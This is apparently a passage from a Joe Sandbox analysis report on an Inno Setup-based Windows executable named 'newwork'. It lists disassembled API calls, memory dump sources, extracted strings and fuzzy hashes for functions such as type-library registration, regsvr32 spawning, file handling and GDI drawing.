                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                        • API String ID: 2610873146-3407710046
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021A3858,00000000), ref: 00458C79
                                                                                        • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                        • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                        • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021A3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                        • String ID: CreateEvent$TransactNamedPipe
                                                                                        • API String ID: 2182916169-3012584893
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                        • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                        • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                        • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                        • API String ID: 1914119943-2711329623
                                                                                        APIs
                                                                                        • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                        • SaveDC.GDI32(?), ref: 00416E27
                                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                        • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                        • DeleteObject.GDI32(?), ref: 00416F22
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                        • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                        • String ID:
                                                                                        • API String ID: 375863564-0
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                        • String ID:
                                                                                        • API String ID: 1694776339-0
                                                                                        • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                        • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                        • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                        • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                        APIs
                                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                        • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                        • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                                        • String ID:
                                                                                        • API String ID: 3985193851-0
                                                                                        • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                        • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                        • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                        • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                        • SendNotifyMessageA.USER32(0001041E,00000496,00002710,00000000), ref: 00481A97
                                                                                        Strings
                                                                                        • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                        • Restarting Windows., xrefs: 00481A72
                                                                                        • Deinitializing Setup., xrefs: 00481872
                                                                                        • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                        • DeinitializeSetup, xrefs: 0048190D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$MessageNotifySend
                                                                                        • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                        • API String ID: 3817813901-1884538726
                                                                                        • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                        • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                        • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                        • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                        APIs
                                                                                        • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                        • GetActiveWindow.USER32 ref: 0046172B
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                        • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                        • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                        • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                        • String ID: A
                                                                                        • API String ID: 2684663990-3554254475
                                                                                        • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                        • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                        • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                        • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                          • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                        • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                        • API String ID: 884541143-1710247218
                                                                                        • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                        • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                        • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                        • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                        • API String ID: 190572456-3516654456
                                                                                        • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                        • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                        • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                        • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                        APIs
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                        • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                        • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                        • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$StretchText
                                                                                        • String ID:
                                                                                        • API String ID: 2984075790-0
                                                                                        • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                        • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                        • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                        • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                        APIs
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDirectoryHandleSystem
                                                                                        • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                        • API String ID: 2051275411-1862435767
                                                                                        • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                        • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                        • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                        • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                        APIs
                                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                        • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                        • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$Color$Draw$OffsetRect
                                                                                        • String ID:
                                                                                        • API String ID: 1005981011-0
                                                                                        • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                        • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                        • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                        • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041B745
                                                                                        • GetDC.USER32(?), ref: 0041B751
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                        • String ID: %H
                                                                                        • API String ID: 3275473261-1959103961
                                                                                        • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                        • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                        • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                        • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041BA17
                                                                                        • GetDC.USER32(?), ref: 0041BA23
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
